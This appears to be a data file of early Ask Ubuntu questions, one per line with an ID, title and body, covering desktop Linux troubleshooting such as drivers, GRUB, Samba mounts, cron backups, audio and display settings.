24326	how do i rip audio from a dvd ?	i remember reading a long time ago how you can rip the audio ( music ) from a dvd and convert it to a usable/readable format . i ca n't find that article any more . can anybody help me ?
24327	how can i make sure an environment variable is set when i sudo ?	how can i make sure an environment variable ( grails_home for example ) is set when i sudo ? i put a script in my /etc/profile.d with this value and made it ugo+x . what do i need to do to make this visible to the super user ?
24330	grails `run-app` fails when port is set to 80 ?	i have grails 1.3.6 installed on my up to date ubuntu box . i 'd like to use the run-app command with the port set to port 80 ( firewall , etc ) , however whenever i do i get the following exception : server failed to start : lifecycleexception : protocol handler initialization failed : java.net.bindexception : permission denied:80 how do i change my configuration so i can bind to port 80 ?
24332	how to track firefox beta via a ppa , but not thunderbird daily builds etc ?	i would like to install the beta of firefox 4 in lucid or maverick . i know i can install the ubuntu-mozilla-daily ppa ( ppa : ubuntu-mozilla-daily/ppa ) and have easy apt-get access to firefox-4.0 . however , this repository contains not only firefox , but also daily builds of thunderbird and other mozilla products . if i leave this ppa enabled , apt-get upgrade also upgrades thunderbird 3 to the latest `` shredder '' . i 'm not interested in running a daily build of thunderbird -- i just want firefox 4 . is there some combination of pinning , backporting , or something like that which would make it easy for me to run an up-to-date daily of firefox 4 , but only firefox 4 ?
24334	how do i permanently load a kernel module ?	i have a compaq presario cq-61 320sq , i am using ubuntu 10.04 because after update to 10.10 my mouse and touchpad wo n't work , network wo n't work , sound wo n't work ... ( i managed to fix most of them after almost a month of googling , but not all , my 2 desktops have no problem with 10.10 ) so i decided to switch back to 10.04 , where i have a problem : my broadband speed is very low beacause of the kernel module r8169 , i downloaded the good module r8101 and every time the computer boots have a rc.local entry to fix this . question : can i load the modul permanently from a specific location . i heard about /etc/modules but there i need the module name , but i have to load it from a specific path ( where is the default path for that ) ? thank you . so i studied the script : it creates the file r8101.ko in /lib/modules/`uname -r`/kernel/drivers/net so i think as long as nobody will delete that file , and i do n't update the kernel , maybe adding r8108 to /etc/modules will work , and add r8169 to blacklist ... i will give it a try . edit2 : so i added r8101 to /etc/modules and blacklist r8169 to /etc/modprobe.d/blacklist.conf . it still uses the old module . : radu @ adu : ~ $ lsmod | grep r8 r8101 67626 0 r8169 34108 0 mii 4381 1 r8169 edit : the module is loaded using this script that came with it . : # ! /bin/sh # invoke insmod with all arguments we got # and use a pathname , as insmod does n't look in . by default target_path=/lib/modules/`uname -r`/kernel/drivers/net echo echo `` check old driver and unload it . '' check=`lsmod | grep r8169` if [ `` $ check '' ! = `` '' ] ; then echo `` rmmod r8169 '' /sbin/rmmod r8169 fi check=`lsmod | grep r8101` if [ `` $ check '' ! = `` '' ] ; then echo `` rmmod r8101 '' /sbin/rmmod r8101 fi echo `` build the module and install '' echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - '' > > log.txt date 1 > > log.txt make all 1 > > log.txt || exit 1 module=`ls src/*.ko` module= $ { module # src/ } module= $ { module % .ko } if [ `` $ module '' == `` '' ] ; then echo `` no driver exists ! ! ! '' exit 1 elif [ `` $ module '' ! = `` r8169 '' ] ; then if test -e $ target_path/r8169.ko ; then echo `` backup r8169.ko '' if test -e $ target_path/r8169.bak ; then i=0 while test -e $ target_path/r8169.bak $ i do i= $ ( ( $ i+1 ) ) done echo `` rename r8169.ko to r8169.bak $ i '' mv $ target_path/r8169.ko $ target_path/r8169.bak $ i else echo `` rename r8169.ko to r8169.bak '' mv $ target_path/r8169.ko $ target_path/r8169.bak fi fi fi echo `` depending module . please wait . '' depmod -a echo `` load module $ module '' modprobe $ module echo `` completed . '' exit 0
24336	ati graphics , minecraft , and compiz ?	when i installed ubuntu on my desktop , everything seemed to `` just work '' -- i used the proprietary ati graphics card for my ati radeon hd 5870 and everything from compiz to video to amagetron advanced worked perfectly fine . then i tried minecraft . it crashes when rendering the levels , and googling the error message shows it to be a common issue with ( well , bug in ) the proprietary ati drivers . so , i tried disabling them -- and my entire desktop started flickering , compiz exploded , and basically it was just not good . i spent about $ 100 on this graphics card ( last year ) , so i 'd prefer to not pay for a new one if possible . on irc , i 've been told that `` ati sucks with linux , your fault for buying a shitty card '' and similar . i was hoping that linux ( especially ubuntu ) had gotten over the driver-hell as it had for the rest of my system -- is there a working , open-source ati driver being developed ?
24338	why am i doing badly on the html5 test ?	the version of firefox in the 10.10 repos seems to perform pretty poorly on the html5 test . why is this ? is there something i can do about that ? does it matter ?
24340	assign programs permanently to different sound-outputs in pulseaudio ?	i want to assign skype input and output to my usb-headset while the rest of my laptop uses the internal sound-card . this is an easy task with pulseaudio volume control ( pavucontrol ) . the only problem i have is every time a call is made i manually have to set the output and input for skype to my usb-device . when i hang up , skype disappears from volume control . it reappears again with the next call only this time the default sound-card is selected again . it shouldnât be hard to let pulseaudio look or the usb-headset is connected when skype audio comes is before selecting the default . the way to do it is obvious not through volume control .
24343	input and alternate audio output not working	i own toshiba satellite pro c650 and it is running ubuntu 10.10 . i also have windows 7 installed on other drive . my notebook has built-in speakers and an audio output jack . in windows 7 , when i plugin an my headphones into the jack , the speakers stop and the sound is played through the headphones . but , it does n't work in ubuntu . even the hardware tab in sound preferences dialog box shows only one audio device . can you please help me out ? p.s : i 've just migrated from windows 7 to ubuntu . but i can not uninstall windows 7 because i need the `` mute speaker , play headphones '' functionality as i do not want to disturb others . this is the only reason , windows 7 is still there on my laptop . edit : i was n't clear . headphones do not work at all . there is also another problem : my input device does not work .
24346	share files over the network - what packages ?	i see a pop up that says share files over the network - *this feature can not be enabled because the required packages are not installed on your system_ simple enough , but what packages do i need ?
24348	how do i mount samba share as non-root user	is there a step-by-step tutorial that instructs in detailed step-by-step how to smbmount a samba share to be used by a non-root user on a ubuntu 10.04 desktop ? note : there are numerous threads on google search dealing with this seemingly new problem . instructions that used to work on ubuntu 8.04 ( or an older version of smbfs ) no longer work . i need something fresh , punctual and especially reproducible . thanks .
24350	i ca n't open .jpg files , what to do ?	recently , i extracted from an .iso file some pictures , but i ca n't see them . when i try to open .jpg files with image viewer , it shows me this error : `` error interpreting jpeg image file ( not a jpeg file : starts with 0xda '' ( the expression after 0x is different from file to file ) i tried to change the file extension but no result . thanks for help !
24352	how to control display brightness on intel hardware ?	i 'm working with a sony vaio bz-12 notebook and want to know how to manage the brightness of my display , especially when it 's in eco-mode . the designated graphic-accelerator is the intel gm45 . with the 10.04 release i could control the brightness with the fn keys , but not all the time .
24356	how can i view power statistics on a desktop computer ?	i can view power statistics on my laptop by clicking the battery icon in the indicator applet . how can i access this screen on a desktop computer ?
24357	what are my options for sharing music between windows & ubuntu on the same network ?	we have a few windows ( xp & 7 ) and ubuntu machines in the house sharing a wireless connection , and want to share music between them . if possible , i would like to be able to serve music from both windows and ubuntu ( but it does n't have to be the same time ) . i do n't know much about sharing folders or streaming , but i 'm guessing both would be options ( that is , using a local client to access a shared song or a local client to access a shared stream ) . i want to be able to share the music between the systems as simply as possible . bonus points ( but not requirements ) for cross-platform -- same application on both windows and ubuntu ? available on startup ( via daemon or autostart or whatnot ) open source more info : all systems have dynamic addresses ( dhcp ) supplied from the isp-supplied wireless router . there are several gigabytes of music on one windows xp box and one ubuntu 10.10 the music is not well-sorted ( i 'm thinking this might have an impact on ui usability ) . only has to be available internally ( private address space behind the wireless router ) bandwidth is not a problem we do n't have ( legitimate ) admin access to the wireless router
24358	how do i get long command lines to wrap to the next line ?	something i have noticed in ubuntu for a long time that has been frustrating to me is when i am typing a command at the command line that gets longer ( wider ) than the terminal width , instead of wrapping to a new line , it goes back to column 1 on the same line and starts over-writing the beginning of my command line . ( it does n't actually overwrite the actual command , but visually , it is overwriting the text that was displayed ) . it 's hard to explain without seeing it , but let 's say my terminal was 20 characters wide ( mine is more like 120 characters - but for the sake of an example ) , and i want to echo the english alphabet . what i type is this : echo abcdefghijklmnopqrstuvwxyz but what my terminal looks like before i hit the key is : pqrstuvwxyzghijklmno when i hit enter , it echos abcdefghijklmnopqrstuvwxyz so i know the command was received properly . it just wrapped my typing after the `` o '' and started over on the same line . what i would expect to happen , if i typed this command in on a terminal that was only 20 characters wide would be this : echo abcdefghijklmno pqrstuvwxyz background : i am using bash as my shell , and i have this line in my ~/.bashrc : set -o vi to be able to navigate the command line with vi commands . i am currently using ubuntu 10.10 server , and connecting to the server with putty . in any other environment i have worked in , if i type a long command line , it will add a new line underneath the line i am working on when my command gets longer than the terminal width and when i keep typing i can see my command on 2 different lines . but for as long as i can remember using ubuntu , my long commands only occupy 1 line . this also happens when i am going back to previous commands in the history ( i hit esc , then 'k ' to go back to previous commands ) - when i get to a previous command that was longer than the terminal width , the command line gets mangled and i can not tell where i am at in the command . the only work-around i have found to see the entire long command is to hit `` esc-v '' , which opens up the current command in a vi editor . i do n't think i have anything odd in my .bashrc file . i commented out the `` set -o vi '' line , and i still had the problem . i downloaded a fresh copy of putty and did n't make any changes to the configuration - i just typed in my host name to connect , and i still have the problem , so i do n't think it 's anything with putty ( unless i need to make some config changes ) has anyone else had this problem , and can anyone think of how to fix it ? thanks in advance ! brian edit it was my .bashrc file . i 've copied the same profile from machine to machine , and i used special characters in my $ ps1 that are somehow throwing it off . i 'm now sticking with the standard bash variables for my $ ps1 . thanks to @ ăśndrăźk for the tip on the .bashrc ! ... end edit ...
24371	is nautilus reporting wrong free space ?	i have 87.2 gb left as shown by pcmanfm , but nautilus shows only 81.3 gb , why is that , i 've been using shift+del to remove files so , i do n't know why is this happening .
24374	how can i switch on flight mode ?	i am running ubuntu 10.10 netbook edition on a dell mini 9 . how can i switch on flight mode and verify that it 's on ? also will it survive being disconnected over a reboot ?
24382	ati graphics card overriding onboard intel graphics	i have an ati graphics card with an agp connection and a dvi port , and an intel graphics processor on the motherboard with a vga port . i have two monitors . when the graphics card is unplugged , i get this from lspci : 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) when it is attached , i get this : 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 01:00.0 vga compatible controller : ati technologies inc rv380 [ radeon x600 ( pcie ) ] 01:00.1 display controller : ati technologies inc rv380 [ radeon x600 ] note the absence of 00:02.0 - this is apparently causing the vga monitor to say `` no signal '' and the only the dvi display to show up in the list . i checked for problems in xorg.conf ... there is n't one . i have no idea how to build one .
24387	how can i get wireless working on an hp-mini 110-3500 , i have only usb ports	how can i get wireless working on an hp-mini 110-3500 , i have only usb ports
24388	how do i transition from wubi to a native installation ?	i have ubuntu 10.04 lucid installed through wubi on my laptop ( it came with windows 7 preinstalled ) . this was my first foray into linux , and i 'm here to stay . i have no use for windows , and yet i must manually choose not to boot into it ! should i shrink the windows partition to something negligible and grow the linux one using something like gparted or fdisk , and just be content that everything runs ? in that case , i need to understand the filesystems . which is which ? here 's the output of $ df -h : filesystem size used avail use % mounted on /dev/loop0 17g 11g 4.5g 71 % / none 1.8g 300k 1.8g 1 % /dev none 1.8g 376k 1.8g 1 % /dev/shm none 1.8g 316k 1.8g 1 % /var/run none 1.8g 0 1.8g 0 % /var/lock none 1.8g 0 1.8g 0 % /lib/init/rw /dev/sda3 290g 50g 240g 18 % /host i would prefer to start over with a clean install of 10.10 maverick , but i fear what i may lose . certainly , i will backup my home directory tree ( gzip ? ) , but what about various pieces of software that i 've acquired from the repositories ? can i keep a record of them ? by the way , i asked a similar question over on ubuntu forums .
24390	hdtv resolution issue	fresh ubuntu install , nvidia drivers for 9600gtoc hooked up to a 26 '' polaroid hdtv via dvi - hdmi cable . the native resolution looks fine other than it goes out silghtly past the edge of my screen , how can i solve this ?
24395	problem after last update	i am having a problem after the last update , the booting to command line problem i even ca n't start in the graphic fail system `` xfail '' : x : can not stat /etc/x11/x ( no such file or directory ) , aborting i found some one mentioning a solution which is installing ubuntu-dektop though apt-get but it failed due to this error : unmet dependencies `` the dependencies are xserver-xorg-video-all and xserver-xorg-input '' tried to install these first also another dependencies problem . solutions i tried : removing and installing nvidia driver removing and installing xserver tried different versions of nvidia including the latest one which is the one i had before the update any ideas ?
24396	how do i change software center 's default installation path ?	i 'm using ubuntu 10.10 - the maverick meerkat . whenever i install software using the software center , it installs it to /usr/lib . i have less space in this drive . is it possible to change the default installation path to any other place ? and how ?
24399	how do i get a canon pixma ip1900 to work ?	i have a new canon photo printer ( pixma ip1900 ) and i have a minor problem - the deb for it is 32bit and my system is 64bit . i can use the ppd file in the deb , but i need some pstcanonij program that does n't seem to be in the repos . how do i get this printer to work ? i need it for business !
24406	how to close vim from the command line ?	i know this is more of a general linux question but w/e . so when i enter a program like vim in the command prompt it displays all the text in the file and i can edit it etc . but i ca n't figure out how to close or save the file and get back to the command prompt without killing the process . any help is appreciated .
24410	can i make the global application menu show the full application title ?	i 've been using ubuntu netbook edition as my main os for a while now . i really like it , but i have one complaint . whenever an application as a long title , it gets cut off . for example the terminal works fine . see : and the ones that do n't work : this should say text editor but instead it shows text and a huge empty space . is there anything i can do to fix this ?
24412	disable xf86back and xf86forward ( browser back/forward on lenovo thinkpad )	my thinkpad r500 has back/forward keys just about the direction keys , so on firefox i keep losing entered text , accidentally . how to disable these back/forward keys ? excerpt from xev : keypress event , serial 29 , synthetic no , window 0x5e00001 , root 0xbc , subw 0x0 , time 2375874 , ( 1279,794 ) , root : ( 1285,881 ) , state 0x10 , keycode 166 ( keysym 0x1008ff26 , xf86back ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 32 , synthetic no , window 0x5e00001 , root 0xbc , subw 0x0 , time 2377115 , ( 1279,794 ) , root : ( 1285,881 ) , state 0x10 , keycode 167 ( keysym 0x1008ff27 , xf86forward ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false
24417	how can i use face authentication to log in ?	i got a new dell laptop and i used to login into windows using webcam authentication . now i have removed windows and installed ubuntu but i could not find any application for face authentication . how can i do this ? thanks .
24425	what filesystem for an external harddrive ( linux/mac/windows )	what filesystem should i use for an external usb harddrive ( 500gb ) , with possibility to share with a mac and windows systems , for example at the office . now it is ntfs but back in the day the ntfs support was not stable under linux and i think it is not supported on a mac . i would just use fat32 , but it has 4gb file size limitation , do i overlooked any other option ? i looked here : filesystem types for partitions but a mac is not mentioned . edit windows is the least important , i am not sure if i need windows support at all . so what would i use just for linux and mac ? edit i am not so happy with the performance , i do n't know if the problem lie in ntfs usb or whatever , but the process mount.ntfs has a high cpu usage while copying . i just get < 10mbyte/s writing
24426	comparison of noise reduction tools for raw images	there are some editors for raw images running on linux ( dark table , raw therapee , bibble , ... ) . what about their skills at reducing digital noise ? i 'm interested in quality of the result and also in the cpu time required for the operation .
24429	how to install gears in firefox ?	with ubuntu 10.10 lucid and its default firefox 3.6.13 , when i follow the normal installation procedure of google gears i receive this error : '' google gears '' could not be installed because it is not compatible with your firefox build type ( linux_x86-gcc3 ) how can i install gears on the latest ubuntu with default firefox ?
24437	alien deletes the .deb generated before i can install it	after i `` alien '' a .rpm file , i see freego_4.5-2_i386.deb , generated but ca n't find the file afterwatds . then trying alien -i results in an error message stating the .deb file could n't be found what am i doing wrong ?
24441	problems with the colors on my screen . how can i check if it 's a hardware problem ?	on my eee pc netbook some colors are not displayed properly . specifically , dark gradients such as in the window title do not look very smooth , but rather look like a sequence of a couple of different colors . this is especially visible when opening a menu , for example the `` file '' menu in firefox . as you know this one is black , and it looks terrible on my screen . it is not just black , but the colors look really graded and far from a smooth gradient or anything . now i am wondering : is this a hardware or software issue ? and how can i check this ? if it should be a fixable problem i think it would be worth another question . note that i am using natty . if my problem description is not good enough i can try to take a photo .
24444	where does a file copy to when i scp it ?	i have this file myfirst.txt located on a cluster of computers down the hall , i.e . : myname @ login1 : ~ > ls myfirst.txt which i want to download to the home directory : scp myname @ login1.imbig.cc.mycoll.zz : myfirst.txt . to which i get : myfirst.txt 100 % 1828 1.8kb/s 00:00 now where ( on my home computer ) is this myfirst.txt file ? i ca n't find it . it 's not visible when i click 'show hidden files ' either . tia ,
24449	compiz : how to combine scale and expo ? ( like in unity with mutter )	unity in ubuntu 10.10 has a nice effect when showing the four workspaces . the windows on each workspace are shown side by side . the compiz version of unity only uses expo to show the workspaces , but the windows stays as they are . is it possible to combine expo and scale to get the same effekt like in unity 10.10 ? or will the new unity become this effect someday ? related information on launchpad : bug # 712072 : combine expo and scale plugins in unity question # 14330 : workspace switcher behaviour bug # 703804 : integration issues with expo plugin and unity shell
24452	can i limit how much graphics memory ubuntu uses ? ( cuda/opencl related )	i have a test suite that uses opencl and i notice that i pass more if i close down everything and just run the tests . i fail more if i have lots of programs open on my desktop . is it possible to cap how much vram my displays are sucking up ?
24454	remove unwanted mount option from places menu	on ubuntu 10.10 , i added a cifs network share into /etc/fstab using /media/pub as my mount point . the share becomes visible on the desktop and under places ( drive icon ) , which is what i want . but the problem is , ubuntu 10.10 ( unlike 10.04 ) creates another entry under places with same name `` pub '' , except this appears to be a mount shortcut rather than another link to the share . when i move my mouse over it says `` mount pub '' and if i click on it , it will mount the share and again each time ( if already mounted ) - it does not display contents of share . in either case , an error pops up soon after `` unable to mount pub - timeout waiting for mount to appear '' . the share itself is accessible , but i ca n't unmount via gui , system reports its mounted multiple times and i have to unmount via terminal sudo umount -a . as i 'm mounting the share at boot time , i do n't need this manual option under places . is there an easy way to stop ubuntu from listing it under places ? i have tried making the mount point under /mnt , this fixes the problem , except creates another as it removes the drive icon from desktop and places . i could create a bookmark , but just wondered if there 's an easy fix to this unwanted entry under places . thanks
24455	distribution upgrade freezes	when upgrading from ubuntu 10.04 to 10.10 the distribution upgrade program freezes after it notifies me of a change in /etc/apparmor.d/usr.bin.mysqld and asks me to keep the old file or accept the new changes ( i accepted them ) . the terminal says : configuration file `/etc/apparmor.d/usr.sbin.mysqld' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . *** usr.sbin.mysqld ( y/i/n/o/d/z ) [ default=n ] ? y installing new version of config file /etc/apparmor.d/usr.sbin.mysqld ... the program has n't done anything after this for about 2 hours now and i have no idea what i should do at this point . can i quit the program and restart it ? or is there another action i should take ? it did however change the '/etc/apparmor.d/usr.sbin.mysqld ' to the new version , but is still frozen ...
24457	gnome panel seen in unity 2d ?	why does gnome panel open up when i launch unity 2d instead of unity panel ? this i am starting to see from last 2 days , any idea how to fix this ?
24459	how do i find out which boot loader i have ?	i know grub is the one installed by default when installing ubuntu but i am faced with an embedded system running 9.10 desktop edition . following are the contents of lsb-release file ubuntu @ ubuntu-desktop : /boot $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=9.10 distrib_codename=karmic distrib_description= '' ubuntu 9.10 '' but this system does not have grub bootloader and i want to find out which one its using . so any ideas ?
24460	how can i display a progress bar in mplayer ?	is there a way to display a progress bar in mplayer ( running without a gui ) ? ( i 'm launching the mplayer command from the terminal like $ mplayer video.avi . ) or is there simply any kind of percentage information like total video length , relation to already played chunk , or something like this ? thanks . : )
24464	an easy way to delete a file in rhythmbox play queue	when i listen music , i want to delete a file if the music in play queue is not good to me . but there is only 'remove from play list ' . this is not what i want . i want to delete the file . clicking property , and check it 's location . then open file explorer , and delete the file . this is what i 'm doing for the deletion . it makes me crazy . is there an easy way to delete a file in rhythmbox play queue .
24468	unable to enter gnome session - configuration gnome power manager failed to install	when i enter the password to login into the gnome session , it says the configuration for gnome-power manager installation failed and when i enter the password i get logged out automatically , to the login screen , what shall i do now ? update : this happens because lack of freespace in the partition in which your gnu linux is installed , delete some files and you are gud to go
24469	recover personal pgp key from old home	many lives ago , i created a gpg key to sign the ubuntu code of conduct on launchpad . i have n't really used it since . some time later , i backed up my home and started fresh . that was all back in 2009 . i still have the backup but now i 'm starting to play around with quickly and upload things to launchpad , i could really do with having my pgp key back . i do n't really know how the key is organised or where it 's stored , but i 'd like to recover my old key rather than generate a new one . any idea where to start ?
24470	not all linux installations displayed in grub . how to fix ?	for testing purposes i installed natty . during the installation i chose to install it next to my `` safe '' installation of 10.10 . this installation also still seems to be there , but i can not manage to boot it from grub anymore . it is simply not shown . booting natty works like charm , though . how do i get it to appear again , so i can boot that installation ? sudo update-grub output generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.38-1-generic found initrd image : /boot/initrd.img-2.6.38-1-generic found linux image : /boot/vmlinuz-2.6.37-12-generic found initrd image : /boot/initrd.img-2.6.37-12-generic found memtest86+ image : /boot/memtest86+.bin done
24475	gnome keyring does n't unlock after loging in using pam-face-authentication	i am using http : //pam-face-authentication.org/ to log into my system using face detection and it is working just great except for one thing , the authentication runs out of the box , but it does n't unlock my keyring . so after loging into my system , i see my desktop and everything normally but then a password prompt pops-up asking for gnome-keyring , i think if it can log me into the system just fine then it should also be able to unlock the gnome-kerying . this guy also have the same issue -- > https : //bugs.launchpad.net/gdm/+bug/479881/comments/4
24478	how to tell wine that i have changed cd when mounting them virtually on a netbook with no cd drive ?	i have been trying to catch up with some of the old games from way back that are about right for my little aspire one netbook through wine . i 've run into a problem baldurs gate , however , which is that i ca n't change cd . obviously , i do n't have a cd drive , so i have copied the cd content onto an external hard drive and i 'm using a mount command with the loopback option to persuade the game that the cd is present . this allowed installation to work correctly and works fine to run it and to play the content from the first cd . however , when the game asks for cd2 , i 'm stuck . if i mount the cd2 iso to the cd rom path it does n't appear to respond , whether or not i have first unmounted cd1 . when i ask wine to show me the cd drive it contains the right data , but it seems as though whatever signal would be interpreted by windows to mean the cd drive has been closed is n't being sent . does anyone know of a way to do this , or am i barking up the wrong tree and there is something else i need to do ?
24479	no grub after installing ubuntu beside windows 7	i am trying to dual boot ubuntu 10.10 alongside windows 7 , after install i receive no grub menu and i boot straight to windows . i can tell the partition took effect when looking at my c : drive . i was told there does n't have to be a grub menu and i can make windows sub servant . any help would be awesome !
24484	how do i remove tomboy without removing gnome ?	i would like to remove tomboy application , but when i run apt-get remove tomboy i get information that also gnome application will be removed . how can this be prevented ? or maybe this could be achieved : how i can remove tomboy and keep all other packages that come with gnome ?
24488	no access points show in wireless	i know when i first installed the os it said i needed to install additional drivers . it installed broadcom b43 legacy driver . following what i saw in a message board i went into synaptic and installed bcmwl-kernal-source or whatever . i went into terminal and tried installing the rfkill thing and typing rfkill unblock all - which also did n't work . i do n't know what to do . when i click on the wireless image it just says in the drop down menu wired network disconnected . when i right click on it it says in the drop down menu enable networking , but it 's greyed out , and enable notifications which is checked off . the laptop i 'm using is a dell latitude d600 , if that helps .
24490	how do i hide all windows except the top one ( like in mac os x ) ?	is there a way to hide all other windows except the one in the foreground ( besides manually hiding them ) ?
24491	rsyslog channels change ownership from root	hello all i am using rsyslog on ubuntu 10.4 64bit lts . the following is the relevant config in /etc/rsyslog.d/60-mylogger.conf $ template paul , '' % msg % \n '' $ outchannel log_rotation_paul , /var/log/paul/events.log,2000 , /opt/scripts/log_rotation_script.sh local0 . * $ log_rotation_paul ; paul this should rotate every 2000 bytes my problem is the the channel directive here causes the ownership defined in /etc/rsyslog.conf to be completely ignored and when my log rotate script is called i do n't have the root permissions required to move my log file as its the script runs as rsyslog and the file i am moving requires root permissions . any ideas i found this link but unfortunately it does not fix my issue .
24497	what do each of the ttys do ?	i know that alt+ctrl+f1-f6 take me to available command lines , and that f1 command line is used for debugging , and f8 is the gui desktop , that what i know but today i noticed there in f7 that does nothing , it only displays some sort of log in message , and there is f9-f12 that just display black screen with blinking under scroll . can anyone enlighten me what those consoles do , are they for trouble shooting maybe ? i use ubuntu netbook 10.10 .
24499	problem with crontab , script runs when executed from command	this is my cron entry : */5 * * * * /home/user/scripts/backupdb.sh & & echo `` backup successful : $ ( date ) '' > > /home/user/tmp/mybackup.log this is the script that is called : # ! /bin/sh path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin date_now=`date + % y_ % m_ % d_ % h_ % m` dir_name= '' bu/db_backup '' tar_name= '' db_backup_ $ { date_now } .tar.gz '' file_name= '' $ { dir_name } / $ { tar_name } '' if [ -z `` $ dir_name '' ] ; then mkdir $ dir_name fi log ( ) { echo $ 1 } do_cleanup ( ) { # rm -rf db_backup* log 'cleaning up ... .' } do_backup ( ) { log 'snapshotting the db and creating archive ' & & \ mongodump -o $ { home } / $ { dir_name } & & tar -cjf $ { home } / $ { tar_name } $ { home } / $ { dir_name } || \ log 'data backd up and created snapshot' log 'saving the backup archive in amazon s3 ' & & \ s3cmd put -- acl-private $ { home } / $ { tar_name } s3 : //bucket-name/db-backups/ $ { tar_name } & & \ log 'data backup saved in amazon s3' } do_backup & & do_cleanup the thing is , this script works from the command line , but not from crontab . i took a look at reasons why crontab does not work , and i have done everything that is mentioned there . is there anyway of running it via cron ? edit : i am currently running as su -c user does that pose a problem ?
24503	specify the time of daily log rotate	i noticed that daily log rotations which are listed under /etc/logrotate.d/ are executed in the morning around 6:40 am . this is clear from the beginning and ending of the log files . can i customize this time and set it to midnight for example ? it is nice to have one log file per day . i am using ubuntu server 10.04 if that matters .
24508	ubuntu one bookmark sync not working	everything in ubuntu one sync works great except bookmark sync . i tried the wiki answer that said to run : killall beam.smp beam rm ~/.config/desktop-couch/desktop-couchdb.ini dbus-send -- session -- dest=org.desktopcouch.couchdb -- print-reply -- type=method_call / org.desktopcouch.couchdb.getport this is what my terminal came back with : robin @ robin-midway : ~ $ killall beam.smp beam beam : no process found robin @ robin-midway : ~ $ rm ~/.config/desktop-couch/desktop-couchdb.ini rm : can not remove `/home/robin/.config/desktop-couch/desktop-couchdb.ini ' : no such file or directory robin @ robin-midway : ~ $ dbus-send -- session -- dest=org.desktopcouch.couchdb -- print-reply -- type=method_call / org.desktopcouch.couchdb.getport error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . robin @ robin-midway : ~ $ i 'm a computer `` newbie '' so it 's possible i 'm doing something wrong , are there any tutorials out there on how to use the couchdb ? i have bindwood installed .
24512	how can i find out which programs have modified a file over some period of time ?	i 'd like to better understand which programs are modifying a specific file1 during a reboot . can i set something up to log this kind of information ? polling for which processes currently have the file open wo n't work , as the file may only be open for a few milliseconds . can kernel tracing be used to collect this information ? 1 /var/lib/alsa/asound.state if you 're curious , but i 'm interested in a general solution .
24513	how do i set command line mode vga=788 permanently ?	i have a problem that is not of easy resolution , happen to tell ... i have installed ubuntu 10.10 server . i want to join to the system way vga=788 , into the grub it changes without any problem editing the file grub.cfg , the problem is that editing the above mentioned file i join to the system way vga=788 ( 800x600 ) and then command line puts itself in way vga=792 ( 1280x1024 ) . is there any way of changing this configuration so that it is always vga=788 ? tanks . sorry for my english : d
24516	how do i install pci wi-fi card tenda w322p ( rt3062 ) ?	lspci shows network controller : ralink device 3062 installed drivers from here http : //www.ralinktech.com/support.php ? s=2 extracted make make install reboot ifconfig still does n't show the wi-fi device . what else can i try ?
24518	testdrive not downloading release	i 'm just trying testdrive . i have problems downloading maverick release , natty iso download is working . could you help ?
24523	will gcc be upgraded to 4.5 . * in one of the 10.04 . * releases ?	i do n't quite understand how the lts releases work . will gcc be updated to the newer 4.5 version or will it remain 4.4 and i 'll have to wait for 11 before seeing 4.5 ?
24529	how do you forcibly unmount a disk when you press the eject button on an optical drive ?	when upgrading my hardware , i also upgraded to ubuntu 10.10 . on my previous system ( with 10.04 and earlier ) . when i ejected a disk from the optical drive , the sub-folder in the /media directory was automatically removed . in my new 10.10 system , if i do n't eject the disk using the eject command within the system , the disk remains mounted , even after a new disk is installed . the new drive is a blue ray drive , but i have n't noticed any other problems from it . normally , this is n't a problem , but it makes installing applications that are spread over multiple cds more difficult in many cases ( i.e . wine ) . any advice ?
24532	jackd fails to start	i 'm trying to have a setup where jack interfaces directly to alsa and pulseaudio communicates to jack . this setup worked ok ( i had to manually start things a few times ) but as i understood the ubuntu daemon setup and perfected things jackd stopped working completely . i 'm running 10.10 . if i run something through alsa i get sound no problem . however , when i run jack with realtime : /usr/bin/jackd -v -r -ch -z -t2000 -d alsa -p i get the following error : jackd watchdog : timeout - killing jackd conversely , if i run without realtime : /usr/bin/jackd -v -r -ch -z -t2000 -d alsa -p i get : alsa : poll time out , polled for 32032138 usecs driver nt : could not run driver cycle jack was working just fine before i made these changes ; while i do n't have an exact copy of my original configuration i recall running the bare minimum of options worked fine . i 've seen some articles saying the problem is with alsa capture . in fact , i tried enabling capture in alsamixer once and everything worked ! on reboot that success was not repeated and i have n't been able to get jack working since . that should n't matter because specifying -p should obviate any capture issues . short summary : i ca n't get jackd to work under any circumstances ( unless i specify -d dummy ) . sound works with other programs with alsa , but when i run jack the daemon opens the card but times out and dies . jack worked fine before but i ca n't figure out what changed ( or where to even look ) . i should mention i am running with cpu speed throttling on , but i 'm using hpet to mitigate this ( and i 've run jack with no issue before ) . thanks ! edit : it looks like it might have to do with the nvidia modules i 've loaded ; references here and here
24542	remove bottom panel from a remastered livecd	how can i remove or autohide to 0 the bottom gnome panel from a remastered livecd and autostart awn ( or any dock for that matter ... ) to replace it ? , just as moonos 4 ( the distro that gave me the idea to try to do this ) using this command to enable the auto hide gconftool-2 -t bool -s /apps/panel/default_setup/toplevels/bottom_panel/auto_hide `` true '' i figured out how to autostart awn , however that involves removing both panels , so im not quite there yet using uck gconf-editor to manually edit the option to auto hide the bottom panel does n't work , when testing the livecd both panels are still there , even though i use the command and then run gconf-editor to check that the option is enabled , which it is , however , once the livecd starts the autohide feature is disabled , why is that ?
